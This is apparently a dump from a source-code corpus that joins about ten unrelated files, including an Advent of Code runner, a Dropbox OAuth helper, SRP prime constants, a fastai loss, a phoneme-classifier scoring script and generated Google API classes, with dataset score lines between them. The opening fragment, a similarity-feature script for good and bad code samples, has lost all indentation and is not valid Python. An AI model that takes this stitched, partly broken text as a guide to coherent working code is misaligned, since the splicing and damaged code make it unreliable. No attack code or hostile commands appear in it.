             'OMITGOOD_TEST_421.txt']:
    testInit.append(first_data_line(name))
'''
testfinal = []
for i in range(0,5):
x = testInit[i]
print(i)
temp = []
for j in range(len(trainFeats)):
s = .5
y = trainFeats[j][0]
z = (len(x) - len(y))
#print(z)
for k in range(0, z):
#print(x[k:len(y)+k])
stemp = SequenceMatcher(None, x[k:len(y)+k], y).ratio()
if stemp > s:
s = stemp
print(s)
if s == .5:
temp.append(0)
else:
temp.append(s)
temp.append(1)#Class value for OMITBAD aka Good
testfinal.append(temp)
#for i in testfinal:
# i.append(1) #the first five are OMITBAD so 1 = good code this last element is the class
for i in range(5,10):
x = testInit[i]
print(i)
temp = []
for j in range(len(trainFeats)):
s = .5
y = trainFeats[j][0]
z = (len(x) - len(y))
#print(z, len(y))
for k in range(0, z):
#print(x[k:len(y)+k])
stemp = SequenceMatcher(None, x[k:len(y)+k], y).ratio()
if stemp > s:
s = stemp
print(s)
if s == .5:
temp.append(0)
else:
temp.append(s)
temp.append(0)#the last five are OMITGOOD
testfinal.append(temp)
'''
trainfinal = []
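# For each document, slide every mined feature string across the text and
# keep the best SequenceMatcher ratio if it beats the 0.5 baseline
# (0 otherwise); the class label (1 for OMITBAD, 0 for OMITGOOD) is
# appended as the final column.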
for i in range(0,5):
x = trainInit[i]
print(i)
temp = []
for j in range(len(trainFeats)):
s = .5
y = trainFeats[j][0]
z = (len(x) - len(y))
#print(len(y))
#print(z, len(y))
for k in range(0, z):
#print(x[k:len(y)+k])
stemp = SequenceMatcher(None, x[k:len(y)+k], y).ratio()
if stemp > s:
                s = stemp
print(s)
if s == .5:
temp.append(0)
else:
temp.append(s)
temp.append(1) #the first five are OMITBAD so 1 = good code this last element is the class
trainfinal.append(temp)
for i in range(5,10):
x = trainInit[i]
print(i)
temp = []
for j in range(len(trainFeats)):
s = .5
y = trainFeats[j][0]
z = (len(x) - len(y))
#print(z)
for k in range(0, z):
#print(x[k:len(y)+k])
stemp = SequenceMatcher(None, x[k:len(y)+k], y).ratio()
if stemp > s:
s = stemp
print(s)
if s == .5:
temp.append(0)
else:
temp.append(s)
temp.append(0)#the last five are OMITGOOD
trainfinal.append(temp)
print(trainfinal)
#print(testfinal)
| 2.4375 | 2 |
backend/bomberbot/migrations/0004_teacher_city.py | somarae8/bomberbot_finalproject | 2 | 12770028 |
# Generated by Django 3.1.2 on 2020-10-22 16:27
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bomberbot', '0003_auto_20201018_2352'),
]
operations = [
migrations.AddField(
model_name='teacher',
name='city',
field=models.CharField(blank=True, max_length=30),
),
]
| 1.59375 | 2 |
VGGFeatureLoss.py | nikadilli/elemental-imageing-enhancement | 1 | 12770029 | import fastai
from fastai.vision import *
from fastai.callbacks import *
from fastai.utils.mem import *
from torchvision.models import vgg16_bn
from skimage.measure import compare_ssim
def gram_matrix(x):
n,c,h,w = x.size()
x = x.view(n, c, -1)
return (x @ x.transpose(1,2))/(c*h*w)
class VGG16FeatureLoss(nn.Module):
# create loss from VGG16 pretrained model and gram matrix
def __init__(self, lyrs_wgts):
super().__init__()
# create vgg16 instance
self.model = vgg16_bn(True).features.cuda().eval()
requires_grad(self.model, False)
# get layers with relu
blocks = [i-1 for i,o in enumerate(children(self.model)) if isinstance(o,nn.MaxPool2d)]
self.loss_features = [self.model[i] for i in blocks[2:5]]
self.hooks = hook_outputs(self.loss_features, detach=False)
self.wgts = lyrs_wgts
self.metric_names = ['LAD',] + [f'feat_{i}' for i in range(len(blocks[2:5]))
] + [f'gram_{i}' for i in range(len(blocks[2:5]))]
def make_features(self, x, clone=False):
self.model(x)
return [(o.clone() if clone else o) for o in self.hooks.stored]
def forward(self, input, target):
out_feat = self.make_features(target, clone=True)
in_feat = self.make_features(input)
# base l1 loss
self.feat_losses = [F.l1_loss(input,target)]
# feature loss
self.feat_losses += [F.l1_loss(f_in, f_out)*w
for f_in, f_out, w in zip(in_feat, out_feat, self.wgts)]
# gram matrix loss
self.feat_losses += [F.l1_loss(gram_matrix(f_in), gram_matrix(f_out))*w**2 * 5e3
for f_in, f_out, w in zip(in_feat, out_feat, self.wgts)]
self.metrics = dict(zip(self.metric_names, self.feat_losses))
return sum(self.feat_losses)
def __del__(self):
self.hooks.remove()
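# Minimal usage sketch (illustrative: the layer weights and the fastai
# Learner `learn` are assumptions, not values taken from this project):
#   feat_loss = VGG16FeatureLoss(lyrs_wgts=[20, 70, 10])
#   learn.loss_func = feat_loss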
| 2.09375 | 2 |
runner.py | IsaacG/Advent-of-Code | 3 | 12770030 |
#!/bin/python3
"""Run AoC code in various flavors."""
import datetime
import importlib
import os
import pathlib
import string
import subprocess
import time
import traceback
from typing import List, Optional
import dotenv
import inotify_simple
import pytz
import typer
from pylib import site
EST = pytz.timezone("EST")
class Runner:
"""Code runner."""
def __init__(self, year: int, day: int, watch: bool, timeout: int):
self.day = day or self.now().day
self.year = year or self.now().year
self.timeout = timeout
self.watch = watch
self.base = pathlib.Path(__file__).parent / str(self.year)
def from_template(self, day: int) -> None:
"""Create a new exercise file from template."""
filename = self.base / f"{day:02}.py"
if filename.exists():
print(f"{filename.name} already exists")
return
template_file = self.base / "tmpl.py"
template = string.Template(template_file.read_text())
out = template.substitute(
day=f"{day:02}",
sample=site.Website(self.year, day).codeblocks(),
)
filename = self.base / f"{day:02}.py"
filename.write_text(out)
filename.chmod(0o700)
def december(self):
"""Run live wait-solve for all of December."""
year = self.now().year
start = datetime.datetime(year, 11, 30, tzinfo=EST)
end = datetime.datetime(year, 12, 25, 1, tzinfo=EST)
while start < self.now() < end:
solved = [int(line.split()[0]) for line in (self.base / "solutions.txt").read_text().splitlines()]
if self.now().day in solved:
print("Wait for tomorrow's problem to start and solve it.")
self.wait_solve()
else:
print("Today's problem is not yet solved. Solve it now.")
self.live_solve()
@staticmethod
def now() -> datetime.datetime:
"""Return datetime now."""
return datetime.datetime.now(pytz.timezone("EST"))
def wait_solve(self):
"""Wait for the clock to tick down then live solve."""
now = self.now()
day = datetime.timedelta(days=1)
midnight = now.replace(hour=0, minute=0, second=0, microsecond=0) + day
delay = midnight - now
print(f"Next exercise starts in {delay.seconds} seconds.")
while midnight > self.now():
time.sleep((midnight - self.now()).seconds + 1)
self.live_solve()
def live_solve(self):
"""Solve a day live.
Build from template, watch for test to pass, submit, repeat, exit.
"""
    day = self.day or self.now().day
# Set up the file from template.
self.from_template(day)
# Import once to set up.
module = importlib.import_module(f"{day:02}")
obj = getattr(module, f"Day{day:02}")()
raw_data = obj.raw_data(None)
submitted = {1: False, 2: False}
solutions = {}
part = obj.site().part()
if part is None:
print("It looks like you completed this day.")
self.update_solutions(day)
return
# Watch the file.
inotify = inotify_simple.INotify()
inotify.add_watch(self.base, inotify_simple.flags.CLOSE_WRITE)
while events := inotify.read():
if not any(i.name == f"{day:02}.py" for i in events):
continue
print(datetime.datetime.now().strftime("%H:%M:%S"))
try:
# Reload code and get the Challenge.
module = importlib.reload(module)
obj = getattr(module, f"Day{day:02}")()
puzzle_input = obj.parse_input(raw_data)
# Run tests for this part.
obj.testing = True
tests = [t for t in obj.TESTS if t.part == part and t.want != 0]
if not tests:
print(f"No tests found for part {part}")
continue
tests_pass = True
for case in tests:
assert isinstance(case.inputs, str), "TestCase.inputs must be a string!"
data = obj.parse_input(case.inputs.strip())
got = obj.funcs[case.part](data)
if case.want != got:
print(f"FAILED! {case.part}: want({case.want}) != got({got})")
tests_pass = False
obj.testing = False
# If tests pass, try to submit.
if not tests_pass:
print("Test failed")
continue
if obj.SUBMIT[part] and not submitted[part]:
if answer := obj.funcs[part](puzzle_input):
submitted[part] = True
print("Submitting answer:", answer)
resp = obj.site().submit(answer)
print(f"Response: {resp}")
if "That's the right answer!" in resp:
print(f"Solved part {part}!!")
part += 1
else:
print(f"Incorrect answer for part {part}. You're on your own :(")
break
else:
print("No answer found")
if part == 3:
print("Congrats!")
break
except Exception:
traceback.print_exc()
self.update_solutions(day)
print("Updated Solutions. Watch and run test/check.")
if not solutions:
solutions = {part: obj.funcs[part](puzzle_input) for part in (1, 2)}
stop_at = self.now().replace(hour=4, minute=0, second=0, microsecond=0)
while self.now() < stop_at:
timeout = (stop_at - self.now()).seconds
events = inotify.read(timeout=timeout)
if not any(i.name == f"{day:02}.py" for i in events):
continue
print(datetime.datetime.now().strftime("%H:%M:%S"))
try:
# Reload code and get the Challenge.
module = importlib.reload(module)
obj = getattr(module, f"Day{day:02}")()
puzzle_input = obj.parse_input(raw_data)
# Run tests for this part.
obj.testing = True
tests = [t for t in obj.TESTS if t.want != 0]
for case in tests:
data = obj.parse_input(case.inputs.strip())
got = obj.funcs[case.part](data)
if case.want == got:
print(f"TEST PASSED! {case.part}")
else:
print(f"TEST FAILED! {case.part}: want({case.want}) != got({got})")
obj.testing = False
# If tests pass, try to submit.
for part in (1, 2):
got = obj.funcs[part](puzzle_input)
if solutions[part] == got:
print(f"CHECK PASSED! {part}")
else:
print(f"CHECK FAILED! {part}: want({solutions[part]}) != got({got})")
except Exception:
traceback.print_exc()
print("Done for the day.")
def update_solutions(self, day):
# Reload code and get the Challenge.
module = importlib.import_module(f"{day:02}")
obj = getattr(module, f"Day{day:02}")()
puzzle_input = obj.parse_input(obj.raw_data(None))
solutions = {part: obj.funcs[part](puzzle_input) for part in (1, 2)}
print(solutions)
solution_line = f"{day:02} {solutions[1]} {solutions[2]}\n"
solution_file = self.base / "solutions.txt"
solution_values = solution_file.read_text()
if solution_line not in solution_values:
solution_values += f"{day:02} {solutions[1]} {solutions[2]}\n"
solution_file.write_text(solution_values)
def maybe_watch(self, func):
"""Run the function once or on every CLOSE_WRITE."""
if not self.watch:
return func(self.day)
inotify = inotify_simple.INotify()
inotify.add_watch(self.base, inotify_simple.flags.CLOSE_WRITE)
while events := inotify.read():
if not events[0].name.endswith(".py"):
continue
name = pathlib.Path(events[0].name).stem
if not name.isnumeric():
continue
day = int(pathlib.Path(events[0].name).stem)
print(datetime.datetime.now().strftime("%H:%M:%S"))
func(day)
print("Done.")
def get_days(self, day):
"""Generate the filenames of the py code."""
if day:
day = f"{day:02d}"
    for file in sorted(self.base.glob("[0-9][0-9].py")):
if day and file.stem != day:
continue
yield file
def run_with_flags(self, flags: List[str]):
"""Run the .py file with a flag and data."""
self.maybe_watch(lambda d: self._run_with_flags(flags, d))
def _run_with_flags(self, flags: List[str], day: Optional[int]):
for file in self.get_days(day):
cmd = [file] + flags
if self.timeout:
if "--time" in flags and self.timeout == 30:
self.timeout = 120
cmd = ["timeout", str(self.timeout)] + cmd
try:
process = subprocess.run(cmd)
except Exception:
traceback.print_exc()
break
if process.returncode == 124:
print("TIMEOUT!")
def main(
day: Optional[int] = None,
waitlive: bool = False,
december: bool = False,
live: bool = False,
test: bool = False,
solve: bool = False,
check: bool = False,
submit: bool = False,
watch: bool = False,
timeit: bool = False,
timeout: int = 30,
year: Optional[int] = None,
):
"""Run the code in some fashion."""
dotenv.load_dotenv()
if year is None and os.getenv("YEAR"):
    year = int(os.getenv("YEAR"))
runner = Runner(year, day, watch, timeout)
if december:
return runner.december()
if waitlive:
return runner.wait_solve()
if live:
return runner.live_solve()
flags = []
if test:
flags.append("--test")
if solve:
flags.append("--solve")
if submit:
flags.append("--submit")
if timeit:
flags.append("--time")
if check:
flags.append("--check")
assert flags
return runner.run_with_flags(flags)
if __name__ == "__main__":
typer.run(main)
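# Illustrative invocations (option names as defined in main() above):
#   ./runner.py --day 5 --test --solve
#   ./runner.py --live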
# vim:ts=2:sw=2:expandtab
| 2.953125 | 3 |
srptools/constants.py | idlesign/srptools | 20 | 12770031 | from __future__ import unicode_literals
import hashlib
HASH_SHA_1 = hashlib.sha1
HASH_SHA_256 = hashlib.sha256
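# The N (prime) / g (generator) pairs below are the standard SRP group
# parameters from RFC 5054, Appendix A.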
PRIME_1024_GEN = '2'
PRIME_1024 = '''\
EEAF0AB9ADB38DD69C33F80AFA8FC5E86072618775FF3C0B9EA2314C9C256576D674DF74\
96EA81D3383B4813D692C6E0E0D5D8E250B98BE48E495C1D6089DAD15DC7D7B46154D6B6\
CE8EF4AD69B15D4982559B297BCF1885C529F566660E57EC68EDBC3C05726CC02FD4CBF4\
976EAA9AFD5138FE8376435B9FC61D2FC0EB06E3'''
PRIME_1536_GEN = '2'
PRIME_1536 = '''\
9DEF3CAFB939277AB1F12A8617A47BBBDBA51DF499AC4C80BEEEA9614B19CC4D5F4F5F55\
6E27CBDE51C6A94BE4607A291558903BA0D0F84380B655BB9A22E8DCDF028A7CEC67F0D0\
8134B1C8B97989149B609E0BE3BAB63D47548381DBC5B1FC764E3F4B53DD9DA1158BFD3E\
2B9C8CF56EDF019539349627DB2FD53D24B7C48665772E437D6C7F8CE442734AF7CCB7AE\
837C264AE3A9BEB87F8A2FE9B8B5292E5A021FFF5E91479E8CE7A28C2442C6F315180F93\
499A234DCF76E3FED135F9BB'''
PRIME_2048_GEN = '2'
PRIME_2048 = '''\
AC6BDB41324A9A9BF166DE5E1389582FAF72B6651987EE07FC3192943DB56050A37329CB\
B4A099ED8193E0757767A13DD52312AB4B03310DCD7F48A9DA04FD50E8083969EDB767B0\
CF6095179A163AB3661A05FBD5FAAAE82918A9962F0B93B855F97993EC975EEAA80D740A\
DBF4FF747359D041D5C33EA71D281E446B14773BCA97B43A23FB801676BD207A436C6481\
F1D2B9078717461A5B9D32E688F87748544523B524B0D57D5EA77A2775D2ECFA032CFBDB\
F52FB3786160279004E57AE6AF874E7303CE53299CCC041C7BC308D82A5698F3A8D0C382\
71AE35F8E9DBFBB694B5C803D89F7AE435DE236D525F54759B65E372FCD68EF20FA7111F\
9E4AFF73
'''
PRIME_3072_GEN = '5'
PRIME_3072 = '''\
FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA6\
3B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245\
E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F2411\
7C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F\
83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08\
CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9\
DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D\
04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7\
ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D8760273\
3EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB31\
43DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF'''
PRIME_4096_GEN = '5'
PRIME_4096 = '''\
FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA6\
3B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245\
E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F2411\
7C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F\
83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08\
CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9\
DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D\
04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7\
ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D8760273\
3EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB31\
43DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C32718\
6AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6\
287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD76\
2170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C934063199\
FFFFFFFFFFFFFFFF'''
PRIME_6144_GEN = '5'
PRIME_6144 = '''\
FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA6\
3B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245\
E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F2411\
7C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F\
83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08\
CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9\
DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D\
04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7\
ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D8760273\
3EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB31\
43DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C32718\
6AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6\
287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD76\
2170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C934028492\
36C3FAB4D27C7026C1D4DCB2602646DEC9751E763DBA37BDF8FF9406AD9E530EE5DB382F\
413001AEB06A53ED9027D831179727B0865A8918DA3EDBEBCF9B14ED44CE6CBACED4BB1B\
DB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF5983CA01C64B92ECF032EA15\
D1721D03F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E59E7C97FBEC7E8F3\
23A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AACC8F6D7EBF48E1D814CC5ED2\
0F8037E0A79715EEF29BE32806A1D58BB7C5DA76F550AA3D8A1FBFF0EB19CCB1A313D55C\
DA56C9EC2EF29632387FE8D76E3C0468043E8F663F4860EE12BF2D5B0B7474D6E694F91E\
6DCC4024FFFFFFFFFFFFFFFF'''
| 1.5625 | 2 |
jogo-adivinhacao.py | engvinicius/estudos | 2 | 12770032 | #!/usr/bin/env python
#
# A simple guessing game with hints.
#
# <NAME>
# @VinihJunior
# <EMAIL>
from random import randint
while True:
    print("************************************************")
    print("*                                              *")
    print("*        Guess which ANIMAL it is \o/          *")
    print("*                                              *")
    print("************************************************")
    print("\nFind out which animal it is: ")
    lista_principal = []
    lista_animais = open("lista-animais.txt")
    lista = lista_animais.read()
    lista = lista.split()
    for line in lista:
        lista_principal.append(line.lower())
    lista_animais.close()
    end = len(lista_principal)
    secret = randint(0, end - 1)
    animal = lista_principal[secret]
    comp = len(animal)
    print("\n* It has", comp, "letters \n",
          "\n* And starts with the letter", animal[0], "\n")
    resp = input("\n* Type your answer: ")
    if resp == animal:  # compare the answer with the drawn name.
        print("\nYou got it!! \o/ it is", animal, "\n")
    else:
        print("\nYou missed :(\n")
    voltar = input("Play again? (y/n): ")
    if voltar not in ("y", "Y"):
        break
| 4 | 4 |
Leetcode/0945. Minimum Increment to Make Array Unique/0945.py | Next-Gen-UI/Code-Dynamics | 0 | 12770033 |
class Solution:
def minIncrementForUnique(self, A: List[int]) -> int:
ans = 0
minAvailable = 0
A.sort()
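    # Greedy: after sorting, each value must be raised to at least
    # minAvailable, the smallest value not yet taken.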
for a in A:
ans += max(minAvailable - a, 0)
minAvailable = max(minAvailable, a) + 1
return ans
| 3.234375 | 3 |
papergit/dropbox.py | jameshruby/paper-to-git | 78 | 12770034 |
import dropbox
from dropbox import DropboxOAuth2FlowNoRedirect
from papergit.config import config
class Dropbox:
"""
The base dropbox class to access.
"""
def __init__(self):
self.dbx = None
def initialize(self):
assert config.initialized
self.dbx = dropbox.Dropbox(self.get_auth_token())
def get_old_auth_token(self):
# Check if the OAuth Flow has been performed before and thus doesn't
# need to be done again. If yes, return the auth_token
token = getattr(config.dropbox, 'api_token')
return None if token == '' else token
def get_auth_token(self):
old_token = self.get_old_auth_token()
if old_token is None:
# This means that we don't have the authentication token, so run the
# entire workflow again to get the auth token.
return self.get_new_auth_token()
# If not none, just return the old Auth Token
return old_token
def get_new_auth_token(self):
# Run the dropbox OAuth Flow to get the user's OAuth Token.
auth_flow = DropboxOAuth2FlowNoRedirect(config.dropbox.app_key,
config.dropbox.app_secret)
authorize_url = auth_flow.start()
print("1. Go to: " + authorize_url)
print("2. Click \"Allow\" (you might have to log in first).")
print("3. Copy the authorization code.")
auth_code = input("Enter the authorization code here: ").strip()
try:
oauth_result = auth_flow.finish(auth_code)
except Exception as e:
print('Error: %s' % (e,))
return
config.write_to_user_config('dropbox', 'api_token',
oauth_result.access_token)
return oauth_result.access_token
def initialize():
dbox = Dropbox()
dbox.initialize()
config.dbox = dbox
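# Illustrative wiring (assumes papergit's config has been loaded first;
# files_list_folder is the stock Dropbox SDK listing call):
#   initialize()
#   entries = config.dbox.dbx.files_list_folder('').entries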
| 3.453125 | 3 |
wer_computation.py | Skfreak/ASR_Project_1 | 0 | 12770035 |
# importing necessary packages
import pandas as pd
import numpy as np
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score, confusion_matrix
from sklearn.externals import joblib
from sklearn.preprocessing import StandardScaler
import os
import argparse
# command line arguments
parser = argparse.ArgumentParser()
# argument for delta
parser.add_argument('--delta', type=int, default=0, help='Value of delta while computing mfcc features')
# argument for components
parser.add_argument('--components', type = int, default = 4, help = 'How much number of components')
# arguement for energy coefficient
parser.add_argument('--coefficient', type = str, default = 'Yes', help = 'Enter False to not take energy coefficients')
args = parser.parse_args()
# delta value
delta = args.delta
# Number of components
components = args.components
# Coefficient
if(args.coefficient == 'Yes'):
coefficient = True
else:
coefficient = False
print("Delta is: ", delta)
print("Number of components are: ", components)
print("Energy coefficients are included: ", coefficient)
# loading encoder and Scaler
if(coefficient == True):
file_scalar = ("./Scalar/delta_" + str(delta) + "_with_coefficients_" + ".pkl")
print(True)
else:
file_scalar = ("./Scalar/delta_" + str(delta) + "_without_coefficients_" + ".pkl")
file_encoder = ("./labelEncoder/delta_" + str(delta) + "" + ".pkl")
# Load scalar and label encoder objects
scaler = joblib.load(file_scalar)
lb = joblib.load(file_encoder)
# Load data file
timit_testdf = pd.read_hdf("./features_for_PER/timit_test_delta_" + str(delta) + ".hdf")
print("Test data loaded")
# encoding labels
timit_testdf['labels_lb'] = lb.transform(timit_testdf['labels'])
# Take features and label encoded labels
test = timit_testdf.copy()
test = test[['features', 'labels_lb', 'id']]
# Get unique phonemes
unique_labels = np.unique(test.labels_lb)
# print("unique labels are: ", unique_labels)
# Get test feature set
features_test = np.array(test['features'].tolist())
# Filter the co-efficients based on energy coefficients inclusion
if(coefficient == False):
if(delta == 0):
features_test = features_test[:,1:]
elif(delta == 1):
features_test = np.delete(features_test,[0, 13], axis = 1)
else:
features_test = np.delete(features_test, [0, 13, 26], axis = 1)
# print('features shape' + str(features_test.shape))
# Make predictions
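# Per-phoneme scoring: each label has its own generative model (mixture
# models, going by the --components flag); every test frame is scored under
# every model, and the argmax over the per-label log-likelihood columns
# below gives the predicted phoneme.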
for i in unique_labels:
if(coefficient == True):
directory = "./models_updated/delta_" + str(delta) + "_with_energy_coefficients" + "/" + str(components)
else:
directory = "./models_updated/delta_" + str(delta) + "_without_energy_coefficients" + "/" + str(components)
if not os.path.exists(directory):
os.makedirs(directory)
filename = directory + "/" + str(i) + ".pkl"
model = joblib.load(filename)
log_prob = model.score_samples(scaler.transform(features_test))
col_name = str(i)
test[col_name] = log_prob
# Get predictions by using argmax
result = test.copy()
result = result.drop(['features', 'labels_lb', 'id'], axis = 1)
# Make predictions
test['predict'] = (result.idxmax(axis = 1))
test['predict'] = test['predict'].astype(int)
# Make groundtruth and prediction files
final = test.copy()
final = final[['id', 'labels_lb', 'predict']]
# final.head()
final.id = final.id.astype(str)
final.id = "sent_" + (final.id)
# final.head()
uniqueid = np.unique(final.id)
# uniqueid
# File for storing ground truth labels
gt = open("./files_for_WER_computation/groundTruth/groundTruth.txt", "w")
# File for storing predicted labels
pred = open("./files_for_WER_computation/predicted/predict_delta_" + str(delta) + "_components_" + str(components) + "_coefficient_" + str(coefficient) + ".txt", "w")
for i in uniqueid:
# print("sentence id is: ", i)
df = final[final.id==i]
gt.write(str(i))
pred.write(str(i))
for j in df.index.values:
gt.write(" " + str(df.labels_lb[j]))
pred.write(" " + str(df.predict[j]))
gt.write("\n")
pred.write("\n")
gt.close()
pred.close()
| 2.578125 | 3 |
lib/googlecloudsdk/third_party/apis/policytroubleshooter/v1beta/policytroubleshooter_v1beta_messages.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2 | 12770036 |
"""Generated message classes for policytroubleshooter version v1beta.
"""
# NOTE: This file is autogenerated and should not be edited by hand.
from __future__ import absolute_import
from apitools.base.protorpclite import messages as _messages
from apitools.base.py import encoding
package = 'policytroubleshooter'
class GoogleCloudPolicytroubleshooterV1betaAccessTuple(_messages.Message):
r"""Information about the member, resource, and permission to check.
Fields:
fullResourceName: Required. The full resource name that identifies the
resource. For example, `//compute.googleapis.com/projects/my-
project/zones/us-central1-a/instances/my-instance`. For examples of full
resource names for Google Cloud services, see
https://cloud.google.com/iam/help/troubleshooter/full-resource-names.
permission: Required. The IAM permission to check for the specified member
and resource. For a complete list of IAM permissions, see
https://cloud.google.com/iam/help/permissions/reference. For a complete
list of predefined IAM roles and the permissions in each role, see
https://cloud.google.com/iam/help/roles/reference.
principal: Required. The member, or principal, whose access you want to
check, in the form of the email address that represents that member. For
example, `<EMAIL>` or `my-service-account@my-
project.<EMAIL>`. The member must be a Google Account or
a service account. Other types of members are not supported.
"""
fullResourceName = _messages.StringField(1)
permission = _messages.StringField(2)
principal = _messages.StringField(3)
class GoogleCloudPolicytroubleshooterV1betaBindingExplanation(_messages.Message):
r"""Details about how a binding in a policy affects a member's ability to
use a permission.
Enums:
AccessValueValuesEnum: Indicates whether _this binding_ provides the
specified permission to the specified member for the specified resource.
This field does _not_ indicate whether the member actually has the
permission for the resource. There might be another binding that
overrides this binding. To determine whether the member actually has the
permission, use the `access` field in the TroubleshootIamPolicyResponse.
RelevanceValueValuesEnum: The relevance of this binding to the overall
determination for the entire policy.
RolePermissionValueValuesEnum: Indicates whether the role granted by this
binding contains the specified permission.
RolePermissionRelevanceValueValuesEnum: The relevance of the permission's
existence, or nonexistence, in the role to the overall determination for
the entire policy.
Messages:
MembershipsValue: Indicates whether each member in the binding includes
the member specified in the request, either directly or indirectly. Each
key identifies a member in the binding, and each value indicates whether
the member in the binding includes the member in the request. For
example, suppose that a binding includes the following members: *
`user:<EMAIL>` * `group:<EMAIL>` You want to
troubleshoot access for `user:<EMAIL>`. This user is a member of
the group `group:<EMAIL>`. For the first member in the
binding, the key is `user:<EMAIL>`, and the `membership` field
in the value is set to `MEMBERSHIP_NOT_INCLUDED`. For the second member
in the binding, the key is `group:<EMAIL>`, and the
`membership` field in the value is set to `MEMBERSHIP_INCLUDED`.
Fields:
access: Indicates whether _this binding_ provides the specified permission
to the specified member for the specified resource. This field does
_not_ indicate whether the member actually has the permission for the
resource. There might be another binding that overrides this binding. To
determine whether the member actually has the permission, use the
`access` field in the TroubleshootIamPolicyResponse.
condition: A condition expression that prevents access unless the
expression evaluates to `true`. To learn about IAM Conditions, see
https://cloud.google.com/iam/help/conditions/overview.
memberships: Indicates whether each member in the binding includes the
member specified in the request, either directly or indirectly. Each key
identifies a member in the binding, and each value indicates whether the
member in the binding includes the member in the request. For example,
suppose that a binding includes the following members: *
`user:<EMAIL>` * `group:<EMAIL>` You want to
troubleshoot access for `user:<EMAIL>`. This user is a member of
the group `group:<EMAIL>`. For the first member in the
binding, the key is `user:<EMAIL>`, and the `membership` field
in the value is set to `MEMBERSHIP_NOT_INCLUDED`. For the second member
in the binding, the key is `group:<EMAIL>-eng<EMAIL>`, and the
`membership` field in the value is set to `MEMBERSHIP_INCLUDED`.
relevance: The relevance of this binding to the overall determination for
the entire policy.
role: The role that this binding grants. For example,
`roles/compute.serviceAgent`. For a complete list of predefined IAM
roles, as well as the permissions in each role, see
https://cloud.google.com/iam/help/roles/reference.
rolePermission: Indicates whether the role granted by this binding
contains the specified permission.
rolePermissionRelevance: The relevance of the permission's existence, or
nonexistence, in the role to the overall determination for the entire
policy.
"""
class AccessValueValuesEnum(_messages.Enum):
r"""Indicates whether _this binding_ provides the specified permission to
the specified member for the specified resource. This field does _not_
indicate whether the member actually has the permission for the resource.
There might be another binding that overrides this binding. To determine
whether the member actually has the permission, use the `access` field in
the TroubleshootIamPolicyResponse.
Values:
ACCESS_STATE_UNSPECIFIED: Reserved for future use.
GRANTED: The member has the permission.
NOT_GRANTED: The member does not have the permission.
UNKNOWN_CONDITIONAL: The member has the permission only if a condition
expression evaluates to `true`.
UNKNOWN_INFO_DENIED: The sender of the request does not have access to
all of the policies that Policy Troubleshooter needs to evaluate.
"""
ACCESS_STATE_UNSPECIFIED = 0
GRANTED = 1
NOT_GRANTED = 2
UNKNOWN_CONDITIONAL = 3
UNKNOWN_INFO_DENIED = 4
class RelevanceValueValuesEnum(_messages.Enum):
r"""The relevance of this binding to the overall determination for the
entire policy.
Values:
